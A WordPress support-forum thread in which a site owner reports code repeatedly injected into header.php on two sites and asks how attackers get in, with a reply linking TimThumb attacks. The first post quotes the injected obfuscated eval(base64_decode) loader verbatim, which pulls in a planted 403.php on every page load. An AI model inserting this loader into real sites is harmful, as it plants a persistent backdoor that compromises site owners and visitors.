WordPress.org

Forums

Hacked: Code inserted into header.php (3 posts)

  1. coopersita
    Member
    Posted 4 years ago #

    Hi,

    I get the following code inserted into my header.php in 2 separate sites (both hosted on Dreamhost):

    <?define('USE_DIRA', '/wp-includes/images/'); @eval(@base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS5VU0VfRElSQS4iNDAzLnBocCIpO3JldHVybiAoJGNoZWUpO31vYl9zdGFydCgiY2FsbGJhY2siKTs="));?>

    Before, the directory was going to the images folder in the default theme, but I deleted the theme, deleted the code, and it appeared again, but now pointing to the images folder in wp-includes.

    In those images folders, 2 files were uploaded: 403.php and links.db.

    I changed all my passwords (db user, and dreamhost login). WordPress is up to date.

    I've deleted the code twice, and it comes up again.

    Any ideas on how they are getting in?

  2. Samuel B
    moderator
    Posted 4 years ago #

  3. MickeyRoush
    Member
    Posted 4 years ago #

    Sucuri.net discovered that the TimThumb attacks are infecting the header.php files now as well. May or may not be related to your issue(s).

    http://blog.sucuri.net/2011/08/timthumb-php-attacks-now-using-googlesafebrowsing-com.html

Topic Closed

This topic has been closed to new replies.

About this Topic